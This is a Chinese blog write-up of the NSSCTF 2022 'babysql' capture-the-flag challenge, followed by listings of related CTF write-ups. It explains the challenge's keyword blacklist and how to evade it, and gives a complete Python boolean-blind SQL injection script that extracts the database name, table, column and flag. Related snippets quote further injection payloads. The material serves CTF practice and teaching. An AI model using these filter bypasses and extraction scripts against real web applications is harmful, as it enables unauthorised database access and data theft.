【NSSCTF 2022 Spring Recruit】babysql

原创 于 2025-03-31 08:43:30 发布 · 301 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #NSSCTF

参考其他师傅的文章

发现只有输入tarnish1、2、3时才会有回显

然后尝试闭合,在fuuz过程中发现了回显,显示了过滤项

hacker!!black_list is /if|and|\s|#|--/i

if可以使用case when来替代

空格可以使用/**/替代

且发现是使用的’来闭合,所以可以在后面接上’2’='1来闭合引号

当使用时可以发现回显中带'flag',使用这个特征来bool盲注tarnishaaa'/**/or/**/'1'='1

在读flag的时候有个问题,就是flag前面有很多不可见字符,要使用mid()来截取

mid截取的长度可以使用通配符来看这个数据有多长,从而选择截取长度_

exp (英文)

import requests
from string import *

url="http://1.14.71.254:28363/"
# payload1="xxx'/**/or/**/case/**/when(show/**/databases/**/like/**/binary/**/{}25)then(1)else/**/0/**/end/**/or/**/'2'='1"
#database=test
# payload2="xxx'/**/or/**/case/**/when((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test')like/**/binary/**/{}25)then(1)else/**/0/**/end/**/or/**/'2'='1"
#table=flag
# payload3="xxx'/**/or/**/case/**/when((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='test')like/**/binary/**/{}25)then(1)else/**/0/**/end/**/or/**/'2'='1"
#column=flag
payload="xxx'/**/or/**/case/**/when((select/**/mid(group_concat(flag),20)/**/from/**/flag)like/**/binary/**/{}25)then(1)else/**/0/**/end/**/or/**/'2'='1"

str=digits+ascii_letters+"{}!@#$^&*()-=<>"

str3='_'#用看数据长度

def str2hex(str):
    hex1='0x'
    for i in str:
        hex1+=hex(ord(i))[2:]
    return hex1
result=''

while True:
    for s in str:
        tmp=result+s
        hex2=str2hex(tmp)
        data = {"username": payload.format(hex2)}
        res=requests.post(url=url,data=data)
        # print(res.text)
        if "flag" in res.text:
            result+=s
            print(result)
            break

XiaoHei_Q
关注
解:[NSSCTF 2022 Spring Recruit]babyphp--TLS_预备队任务(1)
river_mouth_man的博客
03-06 496
绕过php弱比较
[NSSCTF 2022 Spring Recruit]babyphp
F2586的博客
03-01 377
要通过POST方式传b1和b2,并且他们的值不能相同,但是他们的md5值要相同,这里我们还是可以直接用数组绕过。这关需要POST传入c1和c2,同样值不能相等,并且c1和c2都是字符串,而且md5的值弱相等。OK,屏幕显示出现了yee,就说明第二关也过了,接下来我们看第三关。第一关就这样过了,接着看第二关。
sql异同或注入总结
Aiwin的博客
10-12 2153
sql异同或注入总结与[NSSCTF 2022 Spring Recruit]babysql与[CISCN 2019华北Day2]Web1例题
NSSCTF第11页(2)
wwwwyyyrre的博客
11-09 445
直接复制传参发现然后命令执行发现成功了。。。。
[NSSCTF 2022 Spring Recruit]babysql
l181954187的博客
04-17 1461
构造 tarnish'!'1 (True!然后测试一下,发现黑名单:hacker!把注释符号都过滤了,可以使用闭合的方法构造注入,空格使用/**/绕过。看到这个感觉是sql注入,根据他的提示,输入tarnish试试。后面试了半天,不行,直接用二分法。
每日练习-[NSSCTF 2022 Spring Recruit]babysql
m0_68113265的博客
08-20 684
【代码】每日练习-[NSSCTF 2022 Spring Recruit]babysql
NSSCTF 2022 Spring Recruit]ezgame
2302_80059204的博客
12-08 699
打开靶机之后可以看到是一个游戏,那就查看源码看看flag是不是可以直接找到,或者说可以看到获得flag的条件、而且是一个js写的小游戏并找到游戏分数累加所在的位置,那就对js文件进行修改。修改成功之后,游戏随便玩一下,便可得到flag。可以看到只要积分大于65即可获胜。第一步,建一个空文件。
[NSSCTF 2022 Spring Recruit] Crypto wp
bestkasscn的博客
03-22 2510
[NSSCTF 2022 Spring Recruit] Crypto wp classic 题目 UZZJAM{UIXETGR7TMWD42SKTCWEP4AG_mhrlmshnayfihzl} 第一层是凯撒密码 NSSCTF{NBQXMZK7MFPW42LDMVPXI4TZ_fakeflagtrybase} 稍微有点英语基础就知道fakeflagtrybase是假flag,然后去试base,最后用base32解NBQXMZK7MFPW42LDMVPXI4TZ得have_a_nice_try,用NSS
[NSSCTF 2022 Spring Recruit]easy Pe-复现
liaochonxiang的博客
06-02 489
需要注意的是,在此脚本中,输入标志位时不应该包含空格或其他无关字符,否则会导致脚本无法正常运行。5. 如果找到了匹配字符串,则跳转至标签 0,输出 "good_job!6. 如果没有找到匹配字符串,则跳转至标签 1,输出 "sorry..." 并暂停脚本执行。2. 接着从用户的输入中读取获取标志位,并保存在名为input的变量中。3. 如果是,则输出 "good_job!4. 如果不是,则输出 "sorry..." 并暂停脚本执行。2. 判断用户输入的标志位是否为123123。7. 程序执行结束。
记一次[NSSCTF 2022 Spring Recruit]babyphp
dangwobucunzai的博客
03-10 736
第三个if,这里要求b1!=b2,但是又要求md5值相同,在这里也同样是用到了数组绕过,如果md5() 中传入的不是字符串而是数组,不但md5()函数不会报错,结果还会返回null,在强比较(===)里面null=null为true绕过,b1与b2设置不同的值即可,此处传参 b1[]=1&b2[]=2 即可绕过。$a和$b都传入md5()后,得到值为0e开头的数据,会将其识别为科学计数法,结果都为零。通过观察代码,可发现需要通过四个if判断才能拿到我们的flag。这里我使用的是数组绕过,传参 a[]=1。
web buuctf [GXYCTF2019]BabySQli1
weixin_44214568的博客
03-18 1622
知识点:联合注入(当联合查询不存在时,联合查询就会构造一个虚拟的数据) 1.尝试在用户和密码选项中分别进行注入,1' or '1=1'# ;1 or 1=1#;。。。都无法注入 2.再输入1',用户一栏存在报错,且输入为字符型,尝试报错注入,也不行(可以用bp的fuzz,效率高点,根据response,能够知道or和()都被过滤了); 3.级联注入:在用户栏输入1' union select 1,2# 报错Error: The used SELECT statements have a differ
BUUCTF之[极客大挑战 2019]BabySQL 解决方法
weixin_44632787的博客
06-17 2187
BUUCTF之[极客大挑战 2019]BabySQL 解决方法 启动我们的挑战项目 emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 # 不行,报错了。而且我也看不出报错的信息是什么 然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息 所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。 所以我们的payload为:1’ oorr 1=1 %23 发现可以获取到信息,说明我们这个方法是正确的! 然后我们再进行用ord
php语言特性
weixin_63231007的博客
04-15 2125
<1>弱类型比较 我们来看下面一道题: if($_GET['a']!=$_GET['b'] && md5($_GET['a'])==md5($_GET['b'])){ ehco flag; } 如何才能满足这样的if判断条件呢?需要使两个变量不相等而md5值相等。这样的思路可以通过MD5碰撞来解决。让我们思路回到php语言,==存在弱类型比较,而md5函数返回值是一个32位的字符串,如果字符串以"0e"开头的话,类型转换机制会将它识别为一个科学计数法表
[GXYCTF2019]BabySQli 1
m0_62879498的博客
04-13 5586
[GXYCTF2019]BabySQli 1 我们先判断注入点,发现注入点在 用户名('or 1=1-- q) 发现 or 被过滤掉,我们尝试使用大小写绕过,成功。 判断字段数:'OR 1=1 order by 1 – q 使用联合查询 'union select 1,2,3-- q 发现没有直接将回显返回出来 理论上来说,联合查询是不可以使用的 同时,这道题是会有返回了错误信息,是不是感觉报错注入在向自己招手? 想尝试的童鞋可以故意使用错误的sql语句看是否有错误信息回显 但痛苦的是,在本关过滤掉
NSSCTF
weixin_43896504的博客
07-22 3141
NSSCTF
SpringCore RCE 1day漏洞复现(NSSCTF Spring Core RCE)
博客地址 www.sec0nd.top
03-31 3529
文章目录漏洞描述:漏洞影响范围:复现过程解决方案(临时):临时方案1:WAF临时策略临时方案2:临时缓解措施 漏洞描述: 作为目前全球最受欢迎的Java轻量级开源框架,Spring允许开发人员专注于业务逻辑,简化Java企业级应用的开发周期。 但在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并 写入任意路径下的文件。 目前已知,触发该漏洞需要满足两个基本条件: 使
NSSCTF Round#1 Basic [nss2022年4月3日个人赛]web的题解
weixin_51458899的博客
04-04 2680
[nss个人赛]basic_check(复现) (83条消息) Nikto安装和使用_半砖的博客-优快云博客_nikto安装 参考:https://blog.51cto.com/dearch/2053703 单纯复现比较简单 [nssctf个人赛]sql_for_sql 站点功能是: 登录 注册 改密码 登录和注册均没有注入点 考虑改密码的时候会二次注入 结果的确发现了异常,无论是用户名一开始注册的时候加了单引号,还是新密码用了单引号,状态码会报500, 推测改密码的后台sql select p
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8848
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
手机端AIDE安卓的音乐播放器软件代码QZQ.txt
最新发布
12-17
手机端AIDE安卓的音乐播放器软件代码QZQ.txt
Spring Boot与Beetl/BeetlSQL的整合教程
压缩包子文件的文件名称为"recruit",这可能是与Spring Boot项目相关的模块名称或包名。接下来将深入探讨Spring Boot、Beetl和Beetlsql的整合过程和相关知识点。 ### Spring Boot Spring Boot是一个开源Java基础...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值